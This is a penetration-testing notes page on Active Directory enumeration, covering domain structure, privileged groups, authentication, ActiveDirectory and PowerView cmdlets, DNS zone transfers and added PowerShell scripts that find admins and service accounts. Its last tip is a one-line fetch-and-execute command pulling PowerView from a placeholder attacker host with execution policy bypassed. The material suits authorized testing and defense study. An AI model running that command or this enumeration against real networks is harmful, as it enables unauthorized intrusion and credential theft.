killchain-compendium/misc/active_directory/active_directory.md

Active Directory Enumeration

  • Consists of

    • Domain Controller
    • Organizational Units
      • Users
      • Groups
    • Trusts
    • AD Domains
    • AD Forest
    • Policies
  • Privileged built-in groups, whose members are the high-value accounts

    • Domain Admins
    • Enterprise Admins
    • Schema Admins
    • Server Operators
    • Account Operators

Domain Controller

  • AD Domain Services data store
  • Authentication and authorization
  • Update replication / sync with other domain controllers in the forest
  • Administration of domain resources

AD DS Store

  • Database of directory info such as users, groups and services
    • ntds.dit holds the database, including the password hashes of every domain account
    • Default location %SystemRoot%\NTDS (i.e. C:\Windows\NTDS) on each domain controller

Forest

  • Trees, hierarchies of domains that share a contiguous DNS namespace
  • Domains, administrative boundaries that group objects
  • Organizational Units (OU), containers for objects such as groups, users, printers and other resources; policies are linked here
  • Trusts, allow users of one domain to access resources in another domain
  • Objects, e.g. users, groups, printers, computers or shares
  • Domain services, e.g. DNS, LLMNR, SMB
  • Schema, the rules (object classes and attributes) for object creation

Users

  • Domain Admins, full control of the domain including the DCs
  • Service accounts, run and maintain services; frequently over-privileged, sometimes domain admin
  • Local Admins, administrative permission on a single host, not on the domain or the DC
  • Domain Users, the average domain account; may still hold local admin rights on some machines

Policies

  • Rule sets (Group Policy Objects, GPOs)
  • Linked to a domain, site or OU and applied to every object below the link
  • Enable or disable services and settings domain-wide, e.g. antivirus and malware scanning
    • Disable Windows Defender
    • Communication signing, e.g. SMB signing (when signing is not required, relay attacks remain possible)
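The policy settings above are only as good as their effective state on each host. The following script is an added example, not code from the compendium: run on a domain-joined Windows host it reads the Defender state and the SMB signing settings that policy is supposed to enforce, lists the domain's GPOs when the RSAT GroupPolicy module is available, and warns on the weak combinations. It relies on the built-in Defender and SmbShare modules; no names beyond those cmdlets are assumed.

```powershell
# Added example (not from the compendium): check on a domain-joined host whether
# the policy-controlled settings named above are actually in effect.
# Uses the Defender and SmbShare modules shipped with Windows; the GroupPolicy
# module (RSAT) is optional.

$result = [ordered]@{}

# Windows Defender state as pushed (or not) by policy
$mp = Get-MpComputerStatus
$result['DefenderEnabled']    = $mp.AntivirusEnabled
$result['RealTimeProtection'] = $mp.RealTimeProtectionEnabled

# SMB signing: "required" is the setting that stops relay; "enabled" alone only
# signs when both sides agree to it
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration
$result['SmbServerSigningRequired'] = $srv.RequireSecuritySignature
$result['SmbServerSigningEnabled']  = $srv.EnableSecuritySignature
$result['SmbClientSigningRequired'] = $cli.RequireSecuritySignature

# All GPOs defined in the domain (enumeration target; gpresult /r shows the
# subset applied to this host). Needs the RSAT GroupPolicy module.
if (Get-Module -ListAvailable -Name GroupPolicy) {
    Import-Module GroupPolicy
    $result['DomainGpos'] = (Get-GPO -All | Select-Object -ExpandProperty DisplayName) -join '; '
}

[pscustomobject]$result | Format-List

# Flag the weak combinations a pentester looks for
if (-not $srv.RequireSecuritySignature) {
    Write-Warning 'SMB server signing not required: this host accepts unsigned SMB sessions.'
}
if (-not $mp.RealTimeProtectionEnabled) {
    Write-Warning 'Defender real-time protection is off on this host.'
}
```

Run it once per host class (workstation, member server, DC); a GPO that sets RequireSecuritySignature on DCs only is the common gap.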

Domain Services

  • LDAP, directory queries and modifications
  • Certificate handling for services (AD CS), including CRL distribution
  • DNS, with LLMNR and NBT-NS as fallback name resolution

Authentication

  • NTLM, challenge/response: the client proves knowledge of the password hash (NT hash) without sending it
  • Kerberos, ticket based: a TGT from the KDC on the DC, then service tickets from the ticket granting service (TGS)
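Which of the two protocols a logon actually used is recorded in the Security log. The script below is an added example, not from the compendium: it reads successful logons (event 4624), pulls the AuthenticationPackageName and related fields out of the event XML, summarises them per package and logon type, and lists the NTLM network logons, which are the ones pass-the-hash and relay produce. The 24-hour window and the 5000-event cap are assumptions; reading the Security log needs local admin or Event Log Readers membership.

```powershell
# Added example (not from the compendium): tell NTLM and Kerberos logons apart
# from the Security log of the host this runs on.
# Assumptions: a 24 h window and a 5000-event cap.

$since  = (Get-Date).AddHours(-24)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } `
                       -MaxEvents 5000 -ErrorAction SilentlyContinue

$rows = foreach ($ev in $events) {
    # EventData is a list of <Data Name="..."> elements; turn it into a hashtable
    $xml  = [xml]$ev.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $ev.TimeCreated
        User        = "$($data['TargetDomainName'])\$($data['TargetUserName'])"
        LogonType   = $data['LogonType']                   # 2 interactive, 3 network, 10 RDP, ...
        AuthPackage = $data['AuthenticationPackageName']   # 'Kerberos', 'NTLM' or 'Negotiate'
        LmPackage   = $data['LmPackageName']               # e.g. 'NTLM V2' when NTLM was used
        SourceIp    = $data['IpAddress']
    }
}

# Summary per package and logon type. NTLM on a domain-joined host means the
# Kerberos path was unavailable or bypassed (target addressed by IP, no SPN, ...)
$rows | Group-Object AuthPackage, LogonType |
    Select-Object Count, Name | Sort-Object Count -Descending

# NTLM network logons: the shape that pass-the-hash and relay leave behind
$rows | Where-Object { $_.AuthPackage -eq 'NTLM' -and $_.LogonType -eq '3' } |
    Select-Object Time, User, SourceIp, LmPackage
```

On a DC the same query answers the question for the whole domain, since DCs log the network logons they validate.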

Usage

  • Cmdlets, run on a domain controller or on any host with the RSAT ActiveDirectory module

  • Get some help: Get-Help <cmdlet> -Examples (e.g. Get-Help Get-ADUser -Examples), Get-Command Get-AD* to list the module's cmdlets

  • From the ActiveDirectory module

Import-Module ActiveDirectory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
  • systeminfo | findstr Domain
  • Get-ADUser -Filter *
  • Narrow the search with -SearchBase, built from the CN and DC components found above
  • Get-ADUser -Filter * -SearchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"
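The one-liners above answer one question each. The following script is an added example, not code from the compendium: it runs a full first pass with the ActiveDirectory module, combining the domain/forest/trust overview with the members of the privileged groups listed at the top of the page (resolved recursively), the accounts that carry a ServicePrincipalName, and a user query scoped with -SearchBase built from the domain's own DN. Group names are the built-in English names; everything else comes from the queried domain.

```powershell
# Added example (not from the compendium): first enumeration pass with the
# RSAT ActiveDirectory module. Group names are the English built-in names.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$forest = Get-ADForest

# Domain, forest and trust overview
[pscustomobject]@{
    NetBIOSName       = $domain.NetBIOSName
    DNSRoot           = $domain.DNSRoot
    DomainControllers = ($domain.ReplicaDirectoryServers -join ', ')
    ForestRootDomain  = $forest.RootDomain
    AllDomains        = ($forest.Domains -join ', ')
} | Format-List

Get-ADTrust -Filter * | Select-Object Direction, Source, Target, TrustType

# Members of the privileged groups, resolved recursively so that nested
# group membership is not missed
$privilegedGroups = 'Domain Admins', 'Enterprise Admins', 'Schema Admins',
                    'Server Operators', 'Account Operators'

foreach ($group in $privilegedGroups) {
    try {
        $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction Stop |
                   Where-Object objectClass -eq 'user'
        foreach ($m in $members) {
            [pscustomobject]@{ Group = $group; Member = $m.SamAccountName; DN = $m.DistinguishedName }
        }
    } catch {
        # Enterprise Admins and Schema Admins only exist in the forest root domain
        Write-Warning "Could not resolve '$group': $($_.Exception.Message)"
    }
}

# Service accounts: users with a ServicePrincipalName. They often carry admin
# rights, and any authenticated domain user can request their service tickets.
Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
           -Properties ServicePrincipalName, PasswordLastSet, MemberOf |
    Select-Object SamAccountName, PasswordLastSet,
                  @{ n = 'SPNs'; e = { $_.ServicePrincipalName -join '; ' } }

# Scope a user query to the Users container, building the base from the
# domain's DN instead of typing the DC components by hand
Get-ADUser -Filter * -SearchBase "CN=Users,$($domain.DistinguishedName)" |
    Select-Object SamAccountName, Enabled
```

Pipe the per-group objects to Export-Csv when the domain is large; the recursive membership of Domain Admins is usually the first thing a client asks to see.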

Powerview Module

Import-Module .\PowerView.ps1     # works from any domain-joined host, no RSAT needed
Get-NetDomain                     # current domain, same data as Get-ADDomain
Get-NetDomainController           # DCs of the current domain
Get-NetForest                     # forest and its domains
Get-NetDomainTrust                # trust relationships of the current domain

DNS

  • Check own IP and the configured DNS server via ipconfig /all
  • nslookup, then server <DnsServerIP>, then attempt a zone transfer via
ls -d <Domain>
  • ls -d is specific to the Windows nslookup; it fails when the server restricts zone transfers, which is the usual hardened setting
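Even without a zone transfer, DNS gives away the domain's structure through the SRV records domain members use to find services. The script below is an added example, not from the compendium: with Resolve-DnsName (built into Windows) it locates the domain controllers, the Global Catalog and the PDC emulator, resolves the DC names to addresses, and lists the name servers that are the targets for the ls -d attempt above. $domain and $dnsServer are assumptions; drop -Server to use the host's configured resolver.

```powershell
# Added example (not from the compendium): locate DCs and name servers via
# the SRV and NS records AD publishes. $domain and $dnsServer are assumptions.

$domain    = 'corp.local'
$dnsServer = '10.0.0.10'

# Every DC registers an LDAP SRV record under _msdcs
$srv = Resolve-DnsName -Name "_ldap._tcp.dc._msdcs.$domain" -Type SRV -Server $dnsServer -ErrorAction Stop
$dcs = $srv | Where-Object { $_.Type -eq 'SRV' } |
       Select-Object @{ n = 'DC'; e = { $_.NameTarget } }, Port, Priority, Weight

# Resolve each DC name to its address with an explicit A query (the additional
# records of the SRV answer are not always complete)
$dcs | ForEach-Object {
    $a = Resolve-DnsName -Name $_.DC -Type A -Server $dnsServer -ErrorAction SilentlyContinue
    [pscustomobject]@{
        DC       = $_.DC
        IP       = (($a | Where-Object Type -eq 'A').IPAddress -join ',')
        LdapPort = $_.Port
    }
}

# Global Catalog (published in the forest root zone) and the PDC emulator,
# the DC that holds the authoritative copy of password changes
Resolve-DnsName -Name "_gc._tcp.$domain" -Type SRV -Server $dnsServer -ErrorAction SilentlyContinue |
    Where-Object Type -eq 'SRV' | Select-Object NameTarget, Port
Resolve-DnsName -Name "_ldap._tcp.pdc._msdcs.$domain" -Type SRV -Server $dnsServer -ErrorAction SilentlyContinue |
    Where-Object Type -eq 'SRV' | Select-Object NameTarget

# Name servers: these are the hosts to point nslookup at before trying ls -d
Resolve-DnsName -Name $domain -Type NS -Server $dnsServer |
    Where-Object Type -eq 'NS' | Select-Object NameHost
```

In an AD-integrated DNS setup the name servers are normally the DCs themselves, so the NS list doubles as a cross-check of the SRV results.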

Tips & Tricks

  • Download and execute in one line
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerView.ps1'); Get-NetUser | select samaccountname, description"